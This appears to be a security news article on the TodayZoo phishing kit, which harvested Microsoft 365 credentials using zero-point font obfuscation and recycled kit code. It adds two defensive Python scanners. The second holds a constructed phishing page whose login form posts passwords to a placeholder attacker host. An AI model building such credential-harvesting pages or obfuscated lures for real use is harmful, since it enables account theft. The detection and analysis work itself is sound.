Attackers behind an extensive phishing campaign used a partially recycled phishing kit to target victims' Microsoft credentials. The campaign shows how attackers have moved beyond renting phishing kits to building their own customized versions; this one was dubbed TodayZoo because of its "curious" use of those words in its credential-harvesting component.
The copied code segments even retain the comment markers, dead links and other holdovers from the previous kits. TodayZoo was leveraged as the backbone for several widespread phishing campaigns. The emails used a variety of lures, including ones related to password resets or fax notifications. Targeted recipients were prompted to click a link that led through initial and secondary redirect URLs before landing them on a page mimicking the Microsoft 365 sign-in page, which asked for their credentials.
The campaign used an old tactic called zero-point font obfuscation, in which attackers hide words that natural language processing could flag by inserting text with a zero font size between the words. Researchers also noted that the landing page's source code revealed where the stolen credentials would be exfiltrated, an unusual move, since credential-harvesting pages typically forward the stolen passwords to attacker-owned email accounts.
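The zero-point font trick only works if a filter reads the raw markup instead of what the recipient actually sees. The following Python scanner, an added example that is not code from the article or from Microsoft's analysis, separates the rendered text of an HTML email body from fragments hidden by a zero font size, so the visible lure can be fed to a classifier while the hidden padding is counted as a signal. The sample email body and the style variants it checks are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample email body (not from the original campaign): the visible lure
# is interleaved with zero-size text intended to break up phrases a filter might flag.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Your <span style="font-size:0px">xq</span>password<span style="FONT-SIZE: 0pt">zz</span>
 will <span style="font-size: 0">lorem</span>expire today.<br>
Please reset it now.</p>
</body></html>
"""

# Matches a font-size of zero with any unit (0, 0px, 0pt, 0.0em, ...), but not 0.5em.
ZERO_SIZE_RE = re.compile(
    r"font-size\s*:\s*0(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|$|!important)", re.I
)

# Elements that never carry text or a closing tag, so they must not touch the stack.
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col",
             "embed", "source", "track", "wbr"}


class ZeroFontScanner(HTMLParser):
    """Separates the text a reader sees from text hidden by zero-size styling."""

    def __init__(self):
        super().__init__()
        self.visible = []
        self.hidden = []
        self._stack = []        # one entry per open element: True if it opened a hidden region
        self._hidden_depth = 0  # >0 while inside at least one zero-size element

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        is_hidden = bool(ZERO_SIZE_RE.search(style))
        self._stack.append(is_hidden)
        if is_hidden:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self._stack:
            return
        if self._stack.pop():
            self._hidden_depth -= 1

    def handle_data(self, data):
        if self._hidden_depth:
            self.hidden.append(data)
        else:
            self.visible.append(data)


def scan_zero_font(html):
    """Return the rendered text, the zero-size fragments, and a suspicion flag."""
    scanner = ZeroFontScanner()
    scanner.feed(html)
    scanner.close()
    visible = re.sub(r"\s+", " ", "".join(scanner.visible)).strip()
    hidden = [h.strip() for h in scanner.hidden if h.strip()]
    return {
        "visible_text": visible,
        "hidden_fragments": hidden,
        "suspicious": bool(hidden),
    }


if __name__ == "__main__":
    result = scan_zero_font(SAMPLE_EMAIL_HTML)
    print("Rendered text :", result["visible_text"])
    print("Hidden text   :", result["hidden_fragments"])
    print("Suspicious    :", result["suspicious"])
```

The rendered string is what a content filter should score ("Your password will expire today ..."), while any non-empty hidden fragment is itself worth a detection rule, since legitimate mail has little reason to style text at size zero. Style matching is deliberately limited to inline `style` attributes; a production scanner would also resolve `<style>` blocks and class names.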
A Reconstructed Phishing Kit
The consistency of the campaign's redirection URL patterns, domains and other TTPs led researchers to believe that the attackers were using an old phishing kit template and had replaced the credential-harvesting component with their own exfiltration logic.
One of the clues to TodayZoo's origins was the source code of its landing page, which included static references to external source code. Such references typically help a phishing kit mimic the branding of the spoofed login page. But many of the site connections were "dead links," identified by Microsoft as holdovers from other kits available for free or for purchase.
TodayZoo linked to a code block called DanceVida, which many other phishing kits have leveraged. TodayZoo's implementation matched 30 to 35 percent of the larger superset of kits referencing DanceVida, such as a similar phishing kit called "Office-RD117" that shared several components.
While many phishing kits are associated with a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively used the same email campaign patterns, and those email campaigns only ever surfaced TodayZoo kits.
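Two of the observations above, the in-page exfiltration target and the dead external references that betray a kit's lineage, can both be pulled out of a landing page's source without ever contacting the attacker's infrastructure. The following Python triage script is an added example, not code from the article or from Microsoft's research: it collects resource references and form targets from a page, flags forms that post to a host other than the page's own, and scores the overlap of resource paths against a reference fingerprint in the same spirit as the percentage match reported for DanceVida. The page source, hosts (on the reserved `.test` TLD) and reference path set are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed landing-page source with hypothetical hosts; none of this is the
# real campaign's infrastructure.
SAMPLE_LANDING_PAGE = """
<html><head>
<link rel="stylesheet" href="https://cdn.kit-host.test/css/login.css">
<script src="https://cdn.kit-host.test/js/dancevida.js"></script>
<script src="https://defunct-host.test/js/legacy-helper.js"></script>
<img src="/img/ms-logo.png">
</head><body>
<form method="post" action="https://collector.attacker-host.test/post.php">
  <input name="login"><input name="passwd" type="password">
</form>
</body></html>
"""

# Constructed reference fingerprint: resource paths an analyst has already catalogued
# from an earlier kit. Paths are compared rather than hosts because the same kit
# gets redeployed on many domains.
REFERENCE_KIT_PATHS = {"/css/login.css", "/js/dancevida.js", "/js/submit-hook.js"}


class ReferenceExtractor(HTMLParser):
    """Collects resource references and form submission targets from page source."""

    def __init__(self):
        super().__init__()
        self.resources = []
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "img", "iframe") and a.get("src"):
            self.resources.append(a["src"])
        elif tag == "link" and a.get("href"):
            self.resources.append(a["href"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])


def analyze_landing_page(html, page_host):
    """Static triage: external hosts, resource paths and cross-origin form targets."""
    p = ReferenceExtractor()
    p.feed(html)
    p.close()
    external_hosts = set()
    paths = set()
    for ref in p.resources:
        u = urlparse(ref)
        paths.add(u.path)
        if u.hostname and u.hostname != page_host:
            external_hosts.add(u.hostname)
    # A form that posts to a host other than the page itself is the kind of
    # in-source exfiltration target the article describes.
    exfil_targets = sorted({
        urlparse(f).hostname for f in p.form_actions
        if urlparse(f).hostname and urlparse(f).hostname != page_host
    })
    return {
        "external_hosts": sorted(external_hosts),
        "resource_paths": sorted(paths),
        "exfil_targets": exfil_targets,
    }


def shared_resource_ratio(paths_a, paths_b):
    """Jaccard overlap of two resource-path sets, used as a rough kit-lineage score."""
    a, b = set(paths_a), set(paths_b)
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)


if __name__ == "__main__":
    report = analyze_landing_page(SAMPLE_LANDING_PAGE, page_host="login.lure-host.test")
    score = shared_resource_ratio(report["resource_paths"], REFERENCE_KIT_PATHS)
    print("External hosts :", report["external_hosts"])
    print("Exfil targets  :", report["exfil_targets"])
    print("Kit overlap    :", round(score, 2))
```

The external host list is the set of domains worth checking for liveness (offline, from passive DNS or a sandbox) to identify the dead links the researchers used as lineage markers; the exfiltration host is the block-list and takedown candidate. The overlap score is intentionally crude, since a real comparison would hash the referenced files rather than match their paths.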
The Rich Phishing Kit Marketplace
TodayZoo demonstrates the diversity of phishing kits that cybercriminals are recycling, renting or reselling. With phishing leading 33 percent of cyberattacks, cybercriminals on underground marketplaces are getting savvier in how they market, sell and deploy these types of attacks.
Phishing kits, archive files comprising the images, scripts and HTML pages that allow attackers to set up phishing landing pages, are frequently built using chunks of code from other kits. They can be purchased from publicly accessible scam sellers, or reused or repackaged by kit resellers.
The phishing kit economy overall has transformed to become service based, as seen with a recently uncovered phishing-as-a-service operation called BulletProofLink that sells kits, email templates, hosting and automated services at a relatively low cost.
Cybercriminals can either rent resources from phishing-as-a-service providers, who then handle the legwork, or make a one-time purchase of a phishing kit. Like the TodayZoo operators, other attackers are also building their own phishing kits.
The abundance of phishing kits and other tools available for sale or rent makes it easy for a lone-wolf attacker to pick and choose the best features from these kits, assemble them into a customized kit and keep all of the proceeds for themselves.